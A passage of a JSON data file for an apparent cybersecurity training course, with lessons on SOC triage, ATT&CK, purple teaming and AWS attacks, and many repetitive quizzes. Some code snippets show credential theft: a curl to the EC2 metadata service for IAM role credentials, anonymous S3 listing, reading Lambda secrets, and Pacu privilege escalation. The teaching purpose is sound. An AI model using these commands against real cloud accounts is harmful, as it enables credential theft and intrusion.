for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"soc-analyst-workflow","cat":"Defense & Blue Team","title":"SOC Analyst Workflow","diff":1,"xp":75,"intro":"Alert triage, investigation, escalation.","sections":[{"type":"text","content":"Monitor, triage, investigate, contain, escalate, document."},{"type":"code","lang":"bash","content":"# Triage: is it true positive? Check hash, parent process, network, threat intel"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"First step in alert triage?","opts":["Escalate","Determine true or false positive","Block IP","Reboot"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"mitre-attack-mapping","cat":"Defense & Blue Team","title":"MITRE ATT&CK Framework","diff":1,"xp":100,"intro":"Universal language for adversary behavior.","sections":[{"type":"text","content":"Tactics (WHY) and techniques (HOW). Used for threat intel, detection, red teaming."},{"type":"code","lang":"bash","content":"# Map detections to ATT&CK techniques\n# C2 beaconing = T1071, new service = T1543"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"ATT&CK stands for?","opts":["Attack Tactics & Techniques","Adversarial Tactics, Techniques, and Common Knowledge","Advanced Threat Testing","Automated Threat Countermeasure"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"purple-teaming","cat":"Defense & Blue Team","title":"Purple Teaming","diff":2,"xp":150,"intro":"Red and blue working together.","sections":[{"type":"text","content":"Red executes techniques, blue detects. Identify gaps, improve defenses."},{"type":"code","lang":"bash","content":"# 1. Select ATT&CK technique\n# 2. Red executes\n# 3. Blue checks detection\n# 4. If missed: create detection rule\n# 5. Validate"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Purple teaming goal?","opts":["Replace red teams","Improve detection through collaboration","Test network speed","Train analysts"],"ans":1},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"aws-iam-basics","cat":"Cloud & Container","title":"AWS IAM Fundamentals","diff":1,"xp":75,"intro":"Who can do what in your AWS account.","sections":[{"type":"text","content":"Users, groups, roles, policies. Overly permissive policies = #1 cloud issue."},{"type":"code","lang":"bash","content":"aws sts get-caller-identity\naws iam list-attached-user-policies --user-name target"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"#1 cloud security misconfig?","opts":["Open ports","Overly permissive IAM policies","Missing encryption","No logging"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"aws-s3-misconfig","cat":"Cloud & Container","title":"AWS S3 Misconfiguration","diff":1,"xp":75,"intro":"Public S3 buckets leak millions of records.","sections":[{"type":"text","content":"Public read ACLs, bucket policies allowing GetObject to *."},{"type":"code","lang":"bash","content":"aws s3 ls s3://target-bucket --no-sign-request"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Flag for unauthenticated S3 access?","opts":["--public","--no-sign-request","--anonymous","--open"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"aws-metadata-abuse","cat":"Cloud & Container","title":"AWS EC2 Metadata Abuse","diff":2,"xp":200,"intro":"169.254.169.254 hands out IAM credentials.","sections":[{"type":"text","content":"SSRF to the metadata service steals IAM role credentials."},{"type":"code","lang":"bash","content":"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Metadata service IP?","opts":["127.0.0.1","169.254.169.254","10.0.0.1","192.168.1.1"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"aws-lambda-exploit","cat":"Cloud & Container","title":"AWS Lambda Exploitation","diff":2,"xp":150,"intro":"Serverless doesn't mean secure.","sections":[{"type":"text","content":"Lambda functions have IAM roles. Env vars often contain secrets."},{"type":"code","lang":"bash","content":"aws lambda get-function-configuration --function-name target\n# Check Environment.Variables for secrets"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Lambda secrets often stored in?","opts":["Comments","Environment variables","S3","CloudWatch"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"aws-privesc","cat":"Cloud & Container","title":"AWS Privilege Escalation","diff":3,"xp":250,"intro":"From low-privilege IAM to admin. 20+ known paths.","sections":[{"type":"text","content":"Exploit overly permissive policies: CreatePolicyVersion, AttachUserPolicy, PassRole+Lambda."},{"type":"code","lang":"bash","content":"# Pacu\nPacu> run iam__privesc_scan"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS privesc automation tool?","opts":["Metasploit","Pacu","Burp","Nmap"],"ans":1},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes 